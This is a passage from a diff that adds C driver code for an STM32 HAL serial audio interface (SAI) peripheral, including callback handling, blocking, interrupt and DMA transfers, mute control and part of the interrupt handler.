break; + } + } + else if (HAL_SAI_STATE_RESET == hsai->State) + { + switch (CallbackID) + { + case HAL_SAI_MSPINIT_CB_ID : + hsai->MspInitCallback = pCallback; + break; + case HAL_SAI_MSPDEINIT_CB_ID : + hsai->MspDeInitCallback = pCallback; + break; + default : + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + } + return status; +} + +/** + * @brief Unregister a user SAI callback. + * SAI callback is redirected to the weak predefined callback. + * @param hsai SAI handle. + * @param CallbackID ID of the callback to be unregistered. + * This parameter can be one of the following values: + * @arg @ref HAL_SAI_RX_COMPLETE_CB_ID receive complete callback ID. + * @arg @ref HAL_SAI_RX_HALFCOMPLETE_CB_ID receive half complete callback ID. + * @arg @ref HAL_SAI_TX_COMPLETE_CB_ID transmit complete callback ID. + * @arg @ref HAL_SAI_TX_HALFCOMPLETE_CB_ID transmit half complete callback ID. + * @arg @ref HAL_SAI_ERROR_CB_ID error callback ID. + * @arg @ref HAL_SAI_MSPINIT_CB_ID MSP init callback ID. + * @arg @ref HAL_SAI_MSPDEINIT_CB_ID MSP de-init callback ID. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_SAI_UnRegisterCallback(SAI_HandleTypeDef *hsai, + HAL_SAI_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (HAL_SAI_STATE_READY == hsai->State) + { + switch (CallbackID) + { + case HAL_SAI_RX_COMPLETE_CB_ID : + hsai->RxCpltCallback = HAL_SAI_RxCpltCallback; + break; + case HAL_SAI_RX_HALFCOMPLETE_CB_ID : + hsai->RxHalfCpltCallback = HAL_SAI_RxHalfCpltCallback; + break; + case HAL_SAI_TX_COMPLETE_CB_ID : + hsai->TxCpltCallback = HAL_SAI_TxCpltCallback; + break; + case HAL_SAI_TX_HALFCOMPLETE_CB_ID : + hsai->TxHalfCpltCallback = HAL_SAI_TxHalfCpltCallback; + break; + case HAL_SAI_ERROR_CB_ID : + hsai->ErrorCallback = HAL_SAI_ErrorCallback; + break; + case HAL_SAI_MSPINIT_CB_ID : + hsai->MspInitCallback = HAL_SAI_MspInit; + break; + case HAL_SAI_MSPDEINIT_CB_ID : + hsai->MspDeInitCallback = HAL_SAI_MspDeInit; + break; + default : + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_SAI_STATE_RESET == hsai->State) + { + switch (CallbackID) + { + case HAL_SAI_MSPINIT_CB_ID : + hsai->MspInitCallback = HAL_SAI_MspInit; + break; + case HAL_SAI_MSPDEINIT_CB_ID : + hsai->MspDeInitCallback = HAL_SAI_MspDeInit; + break; + default : + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + return status; +} +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup SAI_Exported_Functions_Group2 IO operation functions + * @brief Data transfers functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to manage the SAI data + transfers. + + (+) There are two modes of transfer: + (++) Blocking mode : The communication is performed in the polling mode. + The status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode : The communication is performed using Interrupts + or DMA. These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated SAI IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + + (+) Blocking mode functions are : + (++) HAL_SAI_Transmit() + (++) HAL_SAI_Receive() + + (+) Non Blocking mode functions with Interrupt are : + (++) HAL_SAI_Transmit_IT() + (++) HAL_SAI_Receive_IT() + + (+) Non Blocking mode functions with DMA are : + (++) HAL_SAI_Transmit_DMA() + (++) HAL_SAI_Receive_DMA() + + (+) A set of Transfer Complete Callbacks are provided in non Blocking mode: + (++) HAL_SAI_TxCpltCallback() + (++) HAL_SAI_RxCpltCallback() + (++) HAL_SAI_ErrorCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Transmit an amount of data in blocking mode. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Transmit(SAI_HandleTypeDef *hsai, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart = HAL_GetTick(); + + if ((pData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + if (hsai->State == HAL_SAI_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hsai); + + hsai->XferSize = Size; + hsai->XferCount = Size; + hsai->pBuffPtr = pData; + hsai->State = HAL_SAI_STATE_BUSY_TX; + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + + /* Check if the SAI is already enabled */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == RESET) + { + /* fill the fifo with data before to enabled the SAI */ + SAI_FillFifo(hsai); + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + + while (hsai->XferCount > 0U) + { + /* Write data if the FIFO is not full */ + if ((hsai->Instance->SR & SAI_xSR_FLVL) != SAI_FIFOSTATUS_FULL) + { + if ((hsai->Init.DataSize == SAI_DATASIZE_8) && (hsai->Init.CompandingMode == SAI_NOCOMPANDING)) + { + hsai->Instance->DR = (*hsai->pBuffPtr++); + } + else if (hsai->Init.DataSize <= SAI_DATASIZE_16) + { + hsai->Instance->DR = *((uint16_t *)hsai->pBuffPtr); + hsai->pBuffPtr += 2U; + } + else + { + hsai->Instance->DR = *((uint32_t *)hsai->pBuffPtr); + hsai->pBuffPtr += 4U; + } + hsai->XferCount--; + } + else + { + /* Check for the Timeout */ + if ((Timeout != HAL_MAX_DELAY) && ((Timeout == 0U) || ((HAL_GetTick() - tickstart) > Timeout))) + { + /* Update error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_TIMEOUT; + + /* Clear all the flags */ + hsai->Instance->CLRFR = 0xFFFFFFFFU; + + /* Disable SAI peripheral */ + SAI_Disable(hsai); + + /* Flush the fifo */ + SET_BIT(hsai->Instance->CR2, SAI_xCR2_FFLUSH); + + /* Change the SAI state */ + hsai->State = HAL_SAI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_ERROR; + } + } + } + + hsai->State = HAL_SAI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in blocking mode. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Receive(SAI_HandleTypeDef *hsai, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart = HAL_GetTick(); + + if ((pData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + if (hsai->State == HAL_SAI_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hsai); + + hsai->pBuffPtr = pData; + hsai->XferSize = Size; + hsai->XferCount = Size; + hsai->State = HAL_SAI_STATE_BUSY_RX; + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + + /* Check if the SAI is already enabled */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == RESET) + { + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + + /* Receive data */ + while (hsai->XferCount > 0U) + { + if ((hsai->Instance->SR & SAI_xSR_FLVL) != SAI_FIFOSTATUS_EMPTY) + { + if ((hsai->Init.DataSize == SAI_DATASIZE_8) && (hsai->Init.CompandingMode == SAI_NOCOMPANDING)) + { + (*hsai->pBuffPtr++) = hsai->Instance->DR; + } + else if (hsai->Init.DataSize <= SAI_DATASIZE_16) + { + *((uint16_t *)hsai->pBuffPtr) = hsai->Instance->DR; + hsai->pBuffPtr += 2U; + } + else + { + *((uint32_t *)hsai->pBuffPtr) = hsai->Instance->DR; + hsai->pBuffPtr += 4U; + } + hsai->XferCount--; + } + else + { + /* Check for the Timeout */ + if ((Timeout != HAL_MAX_DELAY) && ((Timeout == 0U) || ((HAL_GetTick() - tickstart) > Timeout))) + { + /* Update error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_TIMEOUT; + + /* Clear all the flags */ + hsai->Instance->CLRFR = 0xFFFFFFFFU; + + /* Disable SAI peripheral */ + SAI_Disable(hsai); + + /* Flush the fifo */ + SET_BIT(hsai->Instance->CR2, SAI_xCR2_FFLUSH); + + /* Change the SAI state */ + hsai->State = HAL_SAI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_ERROR; + } + } + } + + hsai->State = HAL_SAI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit an amount of data in non-blocking mode with Interrupt. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Transmit_IT(SAI_HandleTypeDef *hsai, uint8_t *pData, uint16_t Size) +{ + if ((pData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + if (hsai->State == HAL_SAI_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hsai); + + hsai->pBuffPtr = pData; + hsai->XferSize = Size; + hsai->XferCount = Size; + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + hsai->State = HAL_SAI_STATE_BUSY_TX; + + if ((hsai->Init.DataSize == SAI_DATASIZE_8) && (hsai->Init.CompandingMode == SAI_NOCOMPANDING)) + { + hsai->InterruptServiceRoutine = SAI_Transmit_IT8Bit; + } + else if (hsai->Init.DataSize <= SAI_DATASIZE_16) + { + hsai->InterruptServiceRoutine = SAI_Transmit_IT16Bit; + } + else + { + hsai->InterruptServiceRoutine = SAI_Transmit_IT32Bit; + } + + /* Fill the fifo before starting the communication */ + SAI_FillFifo(hsai); + + /* Enable FRQ and OVRUDR interrupts */ + __HAL_SAI_ENABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + + /* Check if the SAI is already enabled */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == RESET) + { + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in non-blocking mode with Interrupt. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Receive_IT(SAI_HandleTypeDef *hsai, uint8_t *pData, uint16_t Size) +{ + if ((pData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + if (hsai->State == HAL_SAI_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hsai); + + hsai->pBuffPtr = pData; + hsai->XferSize = Size; + hsai->XferCount = Size; + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + hsai->State = HAL_SAI_STATE_BUSY_RX; + + if ((hsai->Init.DataSize == SAI_DATASIZE_8) && (hsai->Init.CompandingMode == SAI_NOCOMPANDING)) + { + hsai->InterruptServiceRoutine = SAI_Receive_IT8Bit; + } + else if (hsai->Init.DataSize <= SAI_DATASIZE_16) + { + hsai->InterruptServiceRoutine = SAI_Receive_IT16Bit; + } + else + { + hsai->InterruptServiceRoutine = SAI_Receive_IT32Bit; + } + + /* Enable TXE and OVRUDR interrupts */ + __HAL_SAI_ENABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + + /* Check if the SAI is already enabled */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == RESET) + { + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Pause the audio stream playing from the Media. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_DMAPause(SAI_HandleTypeDef *hsai) +{ + /* Process Locked */ + __HAL_LOCK(hsai); + + /* Pause the audio file playing by disabling the SAI DMA requests */ + hsai->Instance->CR1 &= ~SAI_xCR1_DMAEN; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; +} + +/** + * @brief Resume the audio stream playing from the Media. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_DMAResume(SAI_HandleTypeDef *hsai) +{ + /* Process Locked */ + __HAL_LOCK(hsai); + + /* Enable the SAI DMA requests */ + hsai->Instance->CR1 |= SAI_xCR1_DMAEN; + + /* If the SAI peripheral is still not enabled, enable it */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == RESET) + { + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; +} + +/** + * @brief Stop the audio stream playing from the Media. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_DMAStop(SAI_HandleTypeDef *hsai) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process Locked */ + __HAL_LOCK(hsai); + + /* Disable the SAI DMA request */ + hsai->Instance->CR1 &= ~SAI_xCR1_DMAEN; + + /* Abort the SAI Tx DMA Stream */ + if ((hsai->hdmatx != NULL) && (hsai->State == HAL_SAI_STATE_BUSY_TX)) + { + if (HAL_DMA_Abort(hsai->hdmatx) != HAL_OK) + { + /* If the DMA Tx errorCode is different from DMA No Transfer then return Error */ + if (hsai->hdmatx->ErrorCode != HAL_DMA_ERROR_NO_XFER) + { + status = HAL_ERROR; + hsai->ErrorCode |= HAL_SAI_ERROR_DMA; + } + } + } + + /* Abort the SAI Rx DMA Stream */ + if ((hsai->hdmarx != NULL) && (hsai->State == HAL_SAI_STATE_BUSY_RX)) + { + if (HAL_DMA_Abort(hsai->hdmarx) != HAL_OK) + { + /* If the DMA Rx errorCode is different from DMA No Transfer then return Error */ + if (hsai->hdmarx->ErrorCode != HAL_DMA_ERROR_NO_XFER) + { + status = HAL_ERROR; + hsai->ErrorCode |= HAL_SAI_ERROR_DMA; + } + } + } + + /* Disable SAI peripheral */ + SAI_Disable(hsai); + + /* Flush the fifo */ + SET_BIT(hsai->Instance->CR2, SAI_xCR2_FFLUSH); + + /* Set hsai state to ready */ + hsai->State = HAL_SAI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return status; +} + +/** + * @brief Abort the current transfer and disable the SAI. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Abort(SAI_HandleTypeDef *hsai) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process Locked */ + __HAL_LOCK(hsai); + + /* Check SAI DMA is enabled or not */ + if ((hsai->Instance->CR1 & SAI_xCR1_DMAEN) == SAI_xCR1_DMAEN) + { + /* Disable the SAI DMA request */ + hsai->Instance->CR1 &= ~SAI_xCR1_DMAEN; + + /* Abort the SAI Tx DMA Stream */ + if ((hsai->hdmatx != NULL) && (hsai->State == HAL_SAI_STATE_BUSY_TX)) + { + if (HAL_DMA_Abort(hsai->hdmatx) != HAL_OK) + { + /* If the DMA Tx errorCode is different from DMA No Transfer then return Error */ + if (hsai->hdmatx->ErrorCode != HAL_DMA_ERROR_NO_XFER) + { + status = HAL_ERROR; + hsai->ErrorCode |= HAL_SAI_ERROR_DMA; + } + } + } + + /* Abort the SAI Rx DMA Stream */ + if ((hsai->hdmarx != NULL) && (hsai->State == HAL_SAI_STATE_BUSY_RX)) + { + if (HAL_DMA_Abort(hsai->hdmarx) != HAL_OK) + { + /* If the DMA Rx errorCode is different from DMA No Transfer then return Error */ + if (hsai->hdmarx->ErrorCode != HAL_DMA_ERROR_NO_XFER) + { + status = HAL_ERROR; + hsai->ErrorCode |= HAL_SAI_ERROR_DMA; + } + } + } + } + + /* Disabled All interrupt and clear all the flag */ + hsai->Instance->IMR = 0U; + hsai->Instance->CLRFR = 0xFFFFFFFFU; + + /* Disable SAI peripheral */ + SAI_Disable(hsai); + + /* Flush the fifo */ + SET_BIT(hsai->Instance->CR2, SAI_xCR2_FFLUSH); + + /* Set hsai state to ready */ + hsai->State = HAL_SAI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return status; +} + +/** + * @brief Transmit an amount of data in non-blocking mode with DMA. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Transmit_DMA(SAI_HandleTypeDef *hsai, uint8_t *pData, uint16_t Size) +{ + uint32_t tickstart = HAL_GetTick(); + + if ((pData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + if (hsai->State == HAL_SAI_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hsai); + + hsai->pBuffPtr = pData; + hsai->XferSize = Size; + hsai->XferCount = Size; + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + hsai->State = HAL_SAI_STATE_BUSY_TX; + + /* Set the SAI Tx DMA Half transfer complete callback */ + hsai->hdmatx->XferHalfCpltCallback = SAI_DMATxHalfCplt; + + /* Set the SAI TxDMA transfer complete callback */ + hsai->hdmatx->XferCpltCallback = SAI_DMATxCplt; + + /* Set the DMA error callback */ + hsai->hdmatx->XferErrorCallback = SAI_DMAError; + + /* Set the DMA Tx abort callback */ + hsai->hdmatx->XferAbortCallback = NULL; + + /* Enable the Tx DMA Stream */ + if (HAL_DMA_Start_IT(hsai->hdmatx, (uint32_t)hsai->pBuffPtr, (uint32_t)&hsai->Instance->DR, hsai->XferSize) != HAL_OK) + { + __HAL_UNLOCK(hsai); + return HAL_ERROR; + } + + /* Enable the interrupts for error handling */ + __HAL_SAI_ENABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_DMA)); + + /* Enable SAI Tx DMA Request */ + hsai->Instance->CR1 |= SAI_xCR1_DMAEN; + + /* Wait until FIFO is not empty */ + while ((hsai->Instance->SR & SAI_xSR_FLVL) == SAI_FIFOSTATUS_EMPTY) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > SAI_LONG_TIMEOUT) + { + /* Update error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_TIMEOUT; + } + } + + /* Check if the SAI is already enabled */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == 0U) + { + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in non-blocking mode with DMA. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Receive_DMA(SAI_HandleTypeDef *hsai, uint8_t *pData, uint16_t Size) +{ + if ((pData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + if (hsai->State == HAL_SAI_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hsai); + + hsai->pBuffPtr = pData; + hsai->XferSize = Size; + hsai->XferCount = Size; + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + hsai->State = HAL_SAI_STATE_BUSY_RX; + + /* Set the SAI Rx DMA Half transfer complete callback */ + hsai->hdmarx->XferHalfCpltCallback = SAI_DMARxHalfCplt; + + /* Set the SAI Rx DMA transfer complete callback */ + hsai->hdmarx->XferCpltCallback = SAI_DMARxCplt; + + /* Set the DMA error callback */ + hsai->hdmarx->XferErrorCallback = SAI_DMAError; + + /* Set the DMA Rx abort callback */ + hsai->hdmarx->XferAbortCallback = NULL; + + /* Enable the Rx DMA Stream */ + if (HAL_DMA_Start_IT(hsai->hdmarx, (uint32_t)&hsai->Instance->DR, (uint32_t)hsai->pBuffPtr, hsai->XferSize) != HAL_OK) + { + __HAL_UNLOCK(hsai); + return HAL_ERROR; + } + + /* Enable the interrupts for error handling */ + __HAL_SAI_ENABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_DMA)); + + /* Enable SAI Rx DMA Request */ + hsai->Instance->CR1 |= SAI_xCR1_DMAEN; + + /* Check if the SAI is already enabled */ + if ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) == RESET) + { + /* Enable SAI peripheral */ + __HAL_SAI_ENABLE(hsai); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsai); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Enable the Tx mute mode. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param val value sent during the mute @ref SAI_Block_Mute_Value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_EnableTxMuteMode(SAI_HandleTypeDef *hsai, uint16_t val) +{ + assert_param(IS_SAI_BLOCK_MUTE_VALUE(val)); + + if (hsai->State != HAL_SAI_STATE_RESET) + { + CLEAR_BIT(hsai->Instance->CR2, SAI_xCR2_MUTEVAL | SAI_xCR2_MUTE); + SET_BIT(hsai->Instance->CR2, SAI_xCR2_MUTE | val); + return HAL_OK; + } + return HAL_ERROR; +} + +/** + * @brief Disable the Tx mute mode. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_DisableTxMuteMode(SAI_HandleTypeDef *hsai) +{ + if (hsai->State != HAL_SAI_STATE_RESET) + { + CLEAR_BIT(hsai->Instance->CR2, SAI_xCR2_MUTEVAL | SAI_xCR2_MUTE); + return HAL_OK; + } + return HAL_ERROR; +} + +/** + * @brief Enable the Rx mute detection. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param callback function called when the mute is detected. + * @param counter number a data before mute detection max 63. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_EnableRxMuteMode(SAI_HandleTypeDef *hsai, SAIcallback callback, uint16_t counter) +{ + assert_param(IS_SAI_BLOCK_MUTE_COUNTER(counter)); + + if (hsai->State != HAL_SAI_STATE_RESET) + { + /* set the mute counter */ + CLEAR_BIT(hsai->Instance->CR2, SAI_xCR2_MUTECNT); + SET_BIT(hsai->Instance->CR2, (uint32_t)((uint32_t)counter << SAI_xCR2_MUTECNT_Pos)); + hsai->mutecallback = callback; + /* enable the IT interrupt */ + __HAL_SAI_ENABLE_IT(hsai, SAI_IT_MUTEDET); + return HAL_OK; + } + return HAL_ERROR; +} + +/** + * @brief Disable the Rx mute detection. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_DisableRxMuteMode(SAI_HandleTypeDef *hsai) +{ + if (hsai->State != HAL_SAI_STATE_RESET) + { + /* set the mutecallback to NULL */ + hsai->mutecallback = (SAIcallback)NULL; + /* enable the IT interrupt */ + __HAL_SAI_DISABLE_IT(hsai, SAI_IT_MUTEDET); + return HAL_OK; + } + return HAL_ERROR; +} + +/** + * @brief Handle SAI interrupt request. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +void HAL_SAI_IRQHandler(SAI_HandleTypeDef *hsai) +{ + if (hsai->State != HAL_SAI_STATE_RESET) + { + uint32_t itflags = hsai->Instance->SR; + uint32_t itsources = hsai->Instance->IMR; + uint32_t cr1config = hsai->Instance->CR1; + uint32_t tmperror; + + /* SAI Fifo request interrupt occurred ------------------------------------*/ + if (((itflags & SAI_xSR_FREQ) == SAI_xSR_FREQ) && ((itsources & SAI_IT_FREQ) == SAI_IT_FREQ)) + { + hsai->InterruptServiceRoutine(hsai); + } + /* SAI Overrun error interrupt occurred ----------------------------------*/ + else if (((itflags & SAI_FLAG_OVRUDR) == SAI_FLAG_OVRUDR) && ((itsources & SAI_IT_OVRUDR) == SAI_IT_OVRUDR)) + { + /* Clear the SAI Overrun flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_OVRUDR); + + /* Get the SAI error code */ + tmperror = ((hsai->State == HAL_SAI_STATE_BUSY_RX) ? HAL_SAI_ERROR_OVR : HAL_SAI_ERROR_UDR); + + /* Change the SAI error code */ + hsai->ErrorCode |= tmperror; + + /* the transfer is not stopped, we will forward the information to the user and we let the user decide what needs to be done */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + /* SAI mutedet interrupt occurred ----------------------------------*/ + else if (((itflags & SAI_FLAG_MUTEDET) == SAI_FLAG_MUTEDET) && ((itsources & SAI_IT_MUTEDET) == SAI_IT_MUTEDET)) + { + /* Clear the SAI mutedet flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_MUTEDET); + + /* call the call back function */ + if (hsai->mutecallback != (SAIcallback)NULL) + { + /* inform the user that an RX mute event has been detected */ + hsai->mutecallback(); + } + } + /* SAI AFSDET interrupt occurred ----------------------------------*/ + else if (((itflags & SAI_FLAG_AFSDET) == SAI_FLAG_AFSDET) && ((itsources & SAI_IT_AFSDET) == SAI_IT_AFSDET)) + { + /* Clear the SAI AFSDET flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_AFSDET); + + /* Change the SAI error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_AFSDET; + + /* Check SAI DMA is enabled or not */ + if ((cr1config & SAI_xCR1_DMAEN) == SAI_xCR1_DMAEN) + { + /* Abort the SAI DMA Streams */ + if (hsai->hdmatx != NULL) + { + /* Set the DMA Tx abort callback */ + hsai->hdmatx->XferAbortCallback = SAI_DMAAbort; + + /* Abort DMA in IT mode */ + HAL_DMA_Abort_IT(hsai->hdmatx); + } + else if (hsai->hdmarx != NULL) + { + /* Set the DMA Rx abort callback */ + hsai->hdmarx->XferAbortCallback = SAI_DMAAbort; + + /* Abort DMA in IT mode */ + HAL_DMA_Abort_IT(hsai->hdmarx); + } + } + else + { + /* Abort SAI */ + HAL_SAI_Abort(hsai); + + /* Set error callback */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + } + /* SAI LFSDET interrupt occurred ----------------------------------*/ + else if (((itflags & SAI_FLAG_LFSDET) == SAI_FLAG_LFSDET) && ((itsources & SAI_IT_LFSDET) == SAI_IT_LFSDET)) + { + /* Clear the SAI LFSDET flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_LFSDET); + + /* Change the SAI error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_LFSDET; + + /* Check SAI DMA is enabled or not */ + if ((cr1config & SAI_xCR1_DMAEN) == SAI_xCR1_DMAEN) + { + /* Abort the SAI DMA Streams */ + if (hsai->hdmatx != NULL) + { + /* Set the DMA Tx abort callback */ + hsai->hdmatx->XferAbortCallback = SAI_DMAAbort; + + /* Abort DMA in IT mode */ + HAL_DMA_Abort_IT(hsai->hdmatx); + } + else if (hsai->hdmarx != NULL) + { + /* Set the DMA Rx abort callback */ + hsai->hdmarx->XferAbortCallback = SAI_DMAAbort; + + /* Abort DMA in IT mode */ + HAL_DMA_Abort_IT(hsai->hdmarx); + } + } + else + { + /* Abort SAI */ + HAL_SAI_Abort(hsai); + + /* Set error callback */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + } + /* SAI WCKCFG interrupt occurred ----------------------------------*/ + else if (((itflags & SAI_FLAG_WCKCFG) == SAI_FLAG_WCKCFG) && ((itsources & SAI_IT_WCKCFG) == SAI_IT_WCKCFG)) + { + /* Clear the SAI WCKCFG flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_WCKCFG); + + /* Change the SAI error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_WCKCFG; + + /* Check SAI DMA is enabled or not */ + if ((cr1config & SAI_xCR1_DMAEN) == SAI_xCR1_DMAEN) + { + /* Abort the SAI DMA Streams */ + if (hsai->hdmatx != NULL) + { + /* Set the DMA Tx abort callback */ + hsai->hdmatx->XferAbortCallback = SAI_DMAAbort; + + /* Abort DMA in IT mode */ + HAL_DMA_Abort_IT(hsai->hdmatx); + } + else if (hsai->hdmarx != NULL) + { + 